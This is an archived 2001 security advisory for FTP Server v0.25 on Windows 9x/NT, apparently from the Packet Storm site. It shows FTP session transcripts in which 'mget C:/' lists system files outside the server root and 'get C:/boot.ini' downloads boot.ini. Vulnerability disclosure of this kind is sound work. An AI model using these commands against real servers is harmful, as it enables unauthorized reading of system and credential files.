what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

ftp.server.025.txt

ftp.server.025.txt
Posted Apr 27, 2001
Authored by Andris K

A bug in FTP server v0.25 for Windows 9x/NT has a bug which allows remote users to download and view any file on the system.

tags | exploit, remote
systems | windows
SHA-256 | 910a99610a7baee20dce791605ca8060728ec4d8313637c82ca433e38c3120c8

ftp.server.025.txt

Change Mirror Download
Andrisk Security Advisory  1# - FTP server v0.25

Topic: FTP Server v.025
Announced: 2001-04-25
Affects: FTP server version 0.25
OS : Win9x/NT

I. Problem Description
**********************
FTP Server 0.25 is an FTP server for Windows 9x/NT. A bug allows any
user download and view any files from remote computer.

II. Impact
**************
When sending the command "mget C:/" then it is possible to view files from C:\
When sending the command "get C:/file [filename]" then it is possible to download current file

Example 1:
--------
ftp> mget
(remote-files) C:/
mget !!?
200 Port command successful.
150 Opening data connection for !!.
501 Cannot RETR. Cannot open file C:\FTP Server\ftproot\!!
mget AUTOEXEC.BAT?
200 Port command successful.
150 Opening data connection for AUTOEXEC.BAT.
501 Cannot RETR. Cannot open file C:\FTP Server\ftproot\AUTOEXEC.BAT
mget boot.ini?
200 Port command successful.
150 Opening data connection for boot.ini.
501 Cannot RETR. Cannot open file C:\FTP Server\ftproot\boot.ini
mget CONFIG.SYS?
200 Port command successful.
150 Opening data connection for CONFIG.SYS.
501 Cannot RETR. Cannot open file C:\FTP Server\ftproot\CONFIG.SYS
mget ffastun.ffa?
200 Port command successful.
150 Opening data connection for ffastun.ffa.
501 Cannot RETR. Cannot open file C:\FTP Server\ftproot\ffastun.ffa
mget ffastun.ffl?
200 Port command successful.
150 Opening data connection for ffastun.ffl.
501 Cannot RETR. Cannot open file C:\FTP Server\ftproot\ffastun.ffl
mget ffastun.ffo?
200 Port command successful.
150 Opening data connection for ffastun.ffo.
501 Cannot RETR. Cannot open file C:\FTP Server\ftproot\ffastun.ffo
mget ffastun0.ffx?
200 Port command successful.
150 Opening data connection for ffastun0.ffx.
501 Cannot RETR. Cannot open file C:\FTP Server\ftproot\ffastun0.ffx
mget FTP Server?
200 Port command successful.
150 Opening data connection for FTP Server.
501 Cannot RETR. Cannot open file C:\FTP Server\ftproot\FTP Server
mget IO.SYS?
200 Port command successful.
150 Opening data connection for IO.SYS.
501 Cannot RETR. Cannot open file C:\FTP Server\ftproot\IO.SYS
mget mirc?
200 Port command successful.
150 Opening data connection for mirc.
501 Cannot RETR. Cannot open file C:\FTP Server\ftproot\mirc
mget MSDOS.SYS?
200 Port command successful.
150 Opening data connection for MSDOS.SYS.
501 Cannot RETR. Cannot open file C:\FTP Server\ftproot\MSDOS.SYS
mget NTDETECT.COM?
200 Port command successful.
150 Opening data connection for NTDETECT.COM.
501 Cannot RETR. Cannot open file C:\FTP Server\ftproot\NTDETECT.COM
mget ntldr?
200 Port command successful.
150 Opening data connection for ntldr.
501 Cannot RETR. Cannot open file C:\FTP Server\ftproot\ntldr
mget os240905.bin?
200 Port command successful.
150 Opening data connection for os240905.bin.
501 Cannot RETR. Cannot open file C:\FTP Server\ftproot\os240905.bin
mget os560179.bin?
200 Port command successful.
150 Opening data connection for os560179.bin.
501 Cannot RETR. Cannot open file C:\FTP Server\ftproot\os560179.bin
mget pagefile.sys?
200 Port command successful.
150 Opening data connection for pagefile.sys.
501 Cannot RETR. Cannot open file C:\FTP Server\ftproot\pagefile.sys
mget Program Files?
200 Port command successful.
150 Opening data connection for Program Files.
501 Cannot RETR. Cannot open file C:\FTP Server\ftproot\Program Files
mget rc5?
200 Port command successful.
150 Opening data connection for rc5.
501 Cannot RETR. Cannot open file C:\FTP Server\ftproot\rc5
mget RECYCLER?
200 Port command successful.
150 Opening data connection for RECYCLER.
501 Cannot RETR. Cannot open file C:\FTP Server\ftproot\RECYCLER
mget TEMP?
200 Port command successful.
150 Opening data connection for TEMP.
501 Cannot RETR. Cannot open file C:\FTP Server\ftproot\TEMP
mget WINNT?
200 Port command successful.
150 Opening data connection for WINNT.
501 Cannot RETR. Cannot open file C:\FTP Server\ftproot\WINNT

**************************************************************************************************
Example 2:

ftp> get
(remote-file) C:/boot.ini
(local-file) boot.ini
local: boot.ini remote: C:/boot.ini
200 Port command successful.
150 Opening data connection for C:/boot.ini.
100% |*********************************************************************************| 289 00:00 ETA
226 File sent ok
289 bytes received in 0.00 seconds (84.00 KB/s)
ftp>

III. Solution
*************
At this time, no patch is available yet.

IV. Credits
***********
Bug discovered by Andris K <andris@talsi.teliamtc.lv>

Greets: Mareks M, Dreef (www.lam.yo.lv), coolynx, ParaTr00p

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close